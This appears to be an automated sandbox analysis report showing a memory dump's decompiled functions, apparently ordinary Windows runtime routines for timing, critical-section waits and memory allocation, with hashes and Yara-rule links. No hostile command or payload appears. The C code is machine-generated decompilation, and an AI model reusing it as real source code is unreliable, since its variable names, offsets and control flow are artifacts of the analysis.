                                                                                                                                    0x04b94a02
                                                                                                                                    0x04b94972
                                                                                                                                    0x04b94974
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b94976
                                                                                                                                    0x04b94979
                                                                                                                                    0x04b94982
                                                                                                                                    0x04b94983
                                                                                                                                    0x04b94984
                                                                                                                                    0x04b9498b
                                                                                                                                    0x04b9498d
                                                                                                                                    0x04b94991
                                                                                                                                    0x04b94993
                                                                                                                                    0x04b94999
                                                                                                                                    0x04b9499d
                                                                                                                                    0x04b949a2
                                                                                                                                    0x04b949a2
                                                                                                                                    0x04b949a2
                                                                                                                                    0x04b94999
                                                                                                                                    0x04b949ac
                                                                                                                                    0x00000000
                                                                                                                                    0x04b949b3
                                                                                                                                    0x04b948f8
                                                                                                                                    0x04b948fe
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b948fe
                                                                                                                                    0x04b94895
                                                                                                                                    0x04b9489c
                                                                                                                                    0x04b948ad
                                                                                                                                    0x04b948b2
                                                                                                                                    0x04b948b5
                                                                                                                                    0x04b948b7
                                                                                                                                    0x04b948ba
                                                                                                                                    0x04b948bc
                                                                                                                                    0x04b948c6
                                                                                                                                    0x04b948c6
                                                                                                                                    0x04b948cb
                                                                                                                                    0x04b948d1
                                                                                                                                    0x04b948d4
                                                                                                                                    0x04b948d8
                                                                                                                                    0x04b948d8
                                                                                                                                    0x00000000
                                                                                                                                    0x04b948d8
                                                                                                                                    0x04b948be
                                                                                                                                    0x04b948c0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b948c2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b948c4
                                                                                                                                    0x00000000
                                                                                                                                    0x04b94882
                                                                                                                                    0x04b9487b
                                                                                                                                    0x04b94904
                                                                                                                                    0x04b94906
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b94908
                                                                                                                                    0x04b9490e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b94910
                                                                                                                                    0x04b94917
                                                                                                                                    0x04b94917
                                                                                                                                    0x00000000
                                                                                                                                    0x04b94917
                                                                                                                                    0x04b3b1ba
                                                                                                                                    0x04b947f9
                                                                                                                                    0x04b947fc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b947fc
                                                                                                                                    0x04b3b1c0
                                                                                                                                    0x04b3b1c0
                                                                                                                                    0x04b3b1c3
                                                                                                                                    0x04b3b1cb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _vswprintf_s
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 677850445-0
                                                                                                                                    • Opcode ID: ad30d69eba283a564da7160d20308e6f34288db024fa39e8c7908ba3478e737e
                                                                                                                                    • Instruction ID: 5e6ae87dc6d99d29b74c54d83b97c9e8e040404a7106f9a97ba371720ecee874
                                                                                                                                    • Opcode Fuzzy Hash: ad30d69eba283a564da7160d20308e6f34288db024fa39e8c7908ba3478e737e
                                                                                                                                    • Instruction Fuzzy Hash: 5C51CD71E182598EEF30CF648884BAEBBF0EF00714F1041FDD869AB281D7706D469B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B5B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                    			E04B5B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x4c2d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04B57D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04C08CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04B79E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E04B7B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E04B7CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04B57D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04C08F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E04B7AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4c28628; // 0x0
								_v68 = _t77;
								_t78 =  *0x4c2862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4c28628; // 0x0
							_t116 =  *0x4c2862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                                                    0x04b5b94c
                                                                                                                                    0x04b5b956
                                                                                                                                    0x04b5b95c
                                                                                                                                    0x04b5b95e
                                                                                                                                    0x04b5b964
                                                                                                                                    0x04b5b969
                                                                                                                                    0x04b5b96d
                                                                                                                                    0x04b5b96d
                                                                                                                                    0x04b5b970
                                                                                                                                    0x04b5b974
                                                                                                                                    0x04b5b97a
                                                                                                                                    0x04b5badf
                                                                                                                                    0x04b5badf
                                                                                                                                    0x04b5bae2
                                                                                                                                    0x04b5bae4
                                                                                                                                    0x04b5bae6
                                                                                                                                    0x04b5baf0
                                                                                                                                    0x04ba2cb8
                                                                                                                                    0x04b5baf6
                                                                                                                                    0x04b5baf6
                                                                                                                                    0x04b5baf6
                                                                                                                                    0x04b5bafd
                                                                                                                                    0x04b5bb1f
                                                                                                                                    0x04b5bb1f
                                                                                                                                    0x04b5baff
                                                                                                                                    0x04b5bb00
                                                                                                                                    0x04b5bb00
                                                                                                                                    0x04b5bb03
                                                                                                                                    0x04b5bb03
                                                                                                                                    0x04b5bacb
                                                                                                                                    0x04b5bacf
                                                                                                                                    0x04b5bad0
                                                                                                                                    0x04b5bad1
                                                                                                                                    0x04b5badc
                                                                                                                                    0x04b5badc
                                                                                                                                    0x04b5b980
                                                                                                                                    0x04b5b980
                                                                                                                                    0x04b5b988
                                                                                                                                    0x04b5b98b
                                                                                                                                    0x04b5b98d
                                                                                                                                    0x04b5b990
                                                                                                                                    0x04b5b993
                                                                                                                                    0x04b5b999
                                                                                                                                    0x04b5b99b
                                                                                                                                    0x04b5b9a1
                                                                                                                                    0x04b5b9a5
                                                                                                                                    0x04b5b9aa
                                                                                                                                    0x04b5b9b0
                                                                                                                                    0x04b5b9bb
                                                                                                                                    0x04b5b9c0
                                                                                                                                    0x04b5b9c3
                                                                                                                                    0x04b5b9ca
                                                                                                                                    0x04b5b9cc
                                                                                                                                    0x04b5b9cf
                                                                                                                                    0x04b5b9d3
                                                                                                                                    0x04b5b9d7
                                                                                                                                    0x04b5ba94
                                                                                                                                    0x04b5ba94
                                                                                                                                    0x04b5ba98
                                                                                                                                    0x04b5baa3
                                                                                                                                    0x04ba2ccb
                                                                                                                                    0x04b5baa9
                                                                                                                                    0x04b5baa9
                                                                                                                                    0x04b5baa9
                                                                                                                                    0x04b5bab1
                                                                                                                                    0x04ba2cd5
                                                                                                                                    0x04ba2cdd
                                                                                                                                    0x04ba2cdd
                                                                                                                                    0x04b5babb
                                                                                                                                    0x04b5babc
                                                                                                                                    0x04b5bac2
                                                                                                                                    0x04b5bac3
                                                                                                                                    0x04b5bac3
                                                                                                                                    0x04b5bac6
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5b9dd
                                                                                                                                    0x04b5b9dd
                                                                                                                                    0x04b5b9e7
                                                                                                                                    0x04b5b9e7
                                                                                                                                    0x04b5b9ec
                                                                                                                                    0x04b5b9ec
                                                                                                                                    0x04b5b9f1
                                                                                                                                    0x04b5b9f5
                                                                                                                                    0x04b5b9fa
                                                                                                                                    0x04b5ba00
                                                                                                                                    0x04b5ba0c
                                                                                                                                    0x04b5ba10
                                                                                                                                    0x04b5ba10
                                                                                                                                    0x04b5ba12
                                                                                                                                    0x04b5ba18
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5bb26
                                                                                                                                    0x04b5bb26
                                                                                                                                    0x04b5ba1e
                                                                                                                                    0x04b5ba1e
                                                                                                                                    0x04b5ba23
                                                                                                                                    0x04b5ba25
                                                                                                                                    0x04b5ba2c
                                                                                                                                    0x04b5ba30
                                                                                                                                    0x04b5ba35
                                                                                                                                    0x04b5ba35
                                                                                                                                    0x04b5ba41
                                                                                                                                    0x04b5ba46
                                                                                                                                    0x04b5ba4c
                                                                                                                                    0x04b5ba50
                                                                                                                                    0x04b5ba54
                                                                                                                                    0x04b5ba6a
                                                                                                                                    0x04b5ba6e
                                                                                                                                    0x04b5ba70
                                                                                                                                    0x04b5ba74
                                                                                                                                    0x04b5ba78
                                                                                                                                    0x04b5ba7a
                                                                                                                                    0x04b5ba7c
                                                                                                                                    0x04b5ba8e
                                                                                                                                    0x04b5ba90
                                                                                                                                    0x04b5ba92
                                                                                                                                    0x04b5bb14
                                                                                                                                    0x04b5bb14
                                                                                                                                    0x04b5bb16
                                                                                                                                    0x04b5bb16
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5ba7c
                                                                                                                                    0x04b5bb0a
                                                                                                                                    0x04b5bb0d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5bb0f

                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B5B9A5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 885266447-0
                                                                                                                                    • Opcode ID: 294f3bff7fdbd107587a91ccdf292af6d750e904b3d2312d82abfba43af165d2
                                                                                                                                    • Instruction ID: a9eb9f21ceb589297608fbcd05d263023b15425974cef5dec58ebb4075c5141f
                                                                                                                                    • Opcode Fuzzy Hash: 294f3bff7fdbd107587a91ccdf292af6d750e904b3d2312d82abfba43af165d2
                                                                                                                                    • Instruction Fuzzy Hash: 9F515A71608340CFD720DF28C480A2AFBE5FB88614F1489AEF99587364EB71F945CB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B32D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                    			E04B32D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4c25350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4c27bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E04B797C0();
				}
				if( *0x4c279c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x4c279c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04B61624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04B57D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E04BCFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04B79520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E04B6E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L04B8DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4c26901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4c26901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04B79980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E04B795D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04B57D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04B57D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04BB7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E04BCFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4c25350;
							if(_t109 != 0x4c25350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E04BCFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04BC5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                                                    0x04b32d8a
                                                                                                                                    0x04b32d8a
                                                                                                                                    0x04b32d92
                                                                                                                                    0x04b32d96
                                                                                                                                    0x04b32d9e
                                                                                                                                    0x04b32da0
                                                                                                                                    0x04b32da3
                                                                                                                                    0x04b32da5
                                                                                                                                    0x04b32da8
                                                                                                                                    0x04b32dab
                                                                                                                                    0x04b32db2
                                                                                                                                    0x04b8f9aa
                                                                                                                                    0x04b8f9ab
                                                                                                                                    0x04b8f9ae
                                                                                                                                    0x04b8f9ae
                                                                                                                                    0x04b32db8
                                                                                                                                    0x04b32dc2
                                                                                                                                    0x04b8f9b9
                                                                                                                                    0x04b8f9be
                                                                                                                                    0x04b8f9bf
                                                                                                                                    0x04b8f9bf
                                                                                                                                    0x04b32dcf
                                                                                                                                    0x04b8f9c9
                                                                                                                                    0x04b32dd5
                                                                                                                                    0x04b32dd5
                                                                                                                                    0x04b32dd5
                                                                                                                                    0x04b32dde
                                                                                                                                    0x04b32de1
                                                                                                                                    0x04b32e70
                                                                                                                                    0x04b32e72
                                                                                                                                    0x04b32e72
                                                                                                                                    0x04b32de7
                                                                                                                                    0x04b32deb
                                                                                                                                    0x04b32e7c
                                                                                                                                    0x04b32e83
                                                                                                                                    0x04b32e85
                                                                                                                                    0x04b32e8b
                                                                                                                                    0x04b32e8d
                                                                                                                                    0x04b32e92
                                                                                                                                    0x04b32e92
                                                                                                                                    0x04b32e85
                                                                                                                                    0x04b32df1
                                                                                                                                    0x04b32df7
                                                                                                                                    0x04b32df9
                                                                                                                                    0x04b32df9
                                                                                                                                    0x04b32dfc
                                                                                                                                    0x04b32dff
                                                                                                                                    0x04b32e02
                                                                                                                                    0x00000000
                                                                                                                                    0x04b32e05
                                                                                                                                    0x04b32e0c
                                                                                                                                    0x04b8f9d9
                                                                                                                                    0x04b32e12
                                                                                                                                    0x04b32e12
                                                                                                                                    0x04b32e12
                                                                                                                                    0x04b32e1a
                                                                                                                                    0x04b8f9e3
                                                                                                                                    0x04b8f9e9
                                                                                                                                    0x04b8f9f0
                                                                                                                                    0x04b8f9f6
                                                                                                                                    0x04b8f9f8
                                                                                                                                    0x04b8f9f8
                                                                                                                                    0x04b8f9f0
                                                                                                                                    0x04b32e23
                                                                                                                                    0x04b8fa02
                                                                                                                                    0x04b8fa03
                                                                                                                                    0x04b8fa05
                                                                                                                                    0x04b8fa06
                                                                                                                                    0x00000000
                                                                                                                                    0x04b32e29
                                                                                                                                    0x04b32e29
                                                                                                                                    0x04b32e2e
                                                                                                                                    0x04b32e34
                                                                                                                                    0x04b32e3e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b32e44
                                                                                                                                    0x04b32e47
                                                                                                                                    0x04b32e4d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b32e4f
                                                                                                                                    0x04b32e54
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b32e5a
                                                                                                                                    0x04b32e5f
                                                                                                                                    0x04b32e9a
                                                                                                                                    0x04b32ea4
                                                                                                                                    0x04b32ea5
                                                                                                                                    0x04b32ea8
                                                                                                                                    0x04b32eaf
                                                                                                                                    0x04b32eb2
                                                                                                                                    0x04b32eb5
                                                                                                                                    0x04b8fae9
                                                                                                                                    0x04b8faeb
                                                                                                                                    0x04b8faed
                                                                                                                                    0x04b8faef
                                                                                                                                    0x04b8faf7
                                                                                                                                    0x04b8faf8
                                                                                                                                    0x04b8fafd
                                                                                                                                    0x04b8faff
                                                                                                                                    0x04b8fb04
                                                                                                                                    0x04b8fb04
                                                                                                                                    0x04b8faff
                                                                                                                                    0x04b32ec0
                                                                                                                                    0x04b32ec4
                                                                                                                                    0x04b32ec6
                                                                                                                                    0x04b32ec8
                                                                                                                                    0x04b8fb14
                                                                                                                                    0x04b8fb18
                                                                                                                                    0x04b8fb1e
                                                                                                                                    0x04b8fb21
                                                                                                                                    0x04b8fb21
                                                                                                                                    0x04b32ece
                                                                                                                                    0x04b32ece
                                                                                                                                    0x04b32ece
                                                                                                                                    0x04b32ed7
                                                                                                                                    0x04b32e61
                                                                                                                                    0x04b32e63
                                                                                                                                    0x04b8fa6b
                                                                                                                                    0x04b8fa71
                                                                                                                                    0x04b8fa76
                                                                                                                                    0x04b8fa78
                                                                                                                                    0x04b8fa8a
                                                                                                                                    0x04b8fa7a
                                                                                                                                    0x04b8fa83
                                                                                                                                    0x04b8fa83
                                                                                                                                    0x04b8fa8f
                                                                                                                                    0x04b8fa91
                                                                                                                                    0x04b8fa97
                                                                                                                                    0x04b8fa9d
                                                                                                                                    0x04b8faa4
                                                                                                                                    0x04b8faaa
                                                                                                                                    0x04b8faaf
                                                                                                                                    0x04b8fab1
                                                                                                                                    0x04b8fac3
                                                                                                                                    0x04b8fab3
                                                                                                                                    0x04b8fabc
                                                                                                                                    0x04b8fabc
                                                                                                                                    0x04b8fac8
                                                                                                                                    0x04b8facb
                                                                                                                                    0x04b8fadf
                                                                                                                                    0x04b8fadf
                                                                                                                                    0x04b8facb
                                                                                                                                    0x04b8faa4
                                                                                                                                    0x04b8fa91
                                                                                                                                    0x04b32e6f
                                                                                                                                    0x04b32e6f
                                                                                                                                    0x04b32e5f
                                                                                                                                    0x04b8fa13
                                                                                                                                    0x04b8fa15
                                                                                                                                    0x04b8fa17
                                                                                                                                    0x04b8fa1f
                                                                                                                                    0x04b8fa21
                                                                                                                                    0x04b8fa22
                                                                                                                                    0x04b8fa25
                                                                                                                                    0x04b8fa28
                                                                                                                                    0x04b8fa2f
                                                                                                                                    0x04b8fa2f
                                                                                                                                    0x04b8fa2a
                                                                                                                                    0x04b8fa2a
                                                                                                                                    0x04b8fa2a
                                                                                                                                    0x04b8fa31
                                                                                                                                    0x04b8fa34
                                                                                                                                    0x04b8fa36
                                                                                                                                    0x04b8fa3c
                                                                                                                                    0x04b8fa3e
                                                                                                                                    0x04b8fa41
                                                                                                                                    0x04b8fa43
                                                                                                                                    0x04b8fa45
                                                                                                                                    0x04b8fa45
                                                                                                                                    0x04b8fa41
                                                                                                                                    0x04b8fa3c
                                                                                                                                    0x04b8fa4a
                                                                                                                                    0x04b8fa4f
                                                                                                                                    0x04b8fa51
                                                                                                                                    0x04b8fa53
                                                                                                                                    0x04b8fa56
                                                                                                                                    0x04b8fa5b
                                                                                                                                    0x04b8fa5e
                                                                                                                                    0x00000000
                                                                                                                                    0x04b8fa5e
                                                                                                                                    0x04b32e23

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Re-Waiting
                                                                                                                                    • API String ID: 0-316354757
                                                                                                                                    • Opcode ID: fac55533f0a3b54717b37915024a2e55774ea52153655f49df67c21a1ba7b431
                                                                                                                                    • Instruction ID: 55d91823280cb33d6b28238e98d54e32567cd2234ba3e2436713b4becaa844fa
                                                                                                                                    • Opcode Fuzzy Hash: fac55533f0a3b54717b37915024a2e55774ea52153655f49df67c21a1ba7b431
                                                                                                                                    • Instruction Fuzzy Hash: BA614170B00614AFEB35EF69C880B7EB7B5EB44728F1406EAE811972C0DB74B902D791
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04C00EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                    			E04C00EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E04BFFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04C01074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04B79730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E04BFA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E04BFA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4c28b04 >> 0x14) + (_v44 -  *0x4c28b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
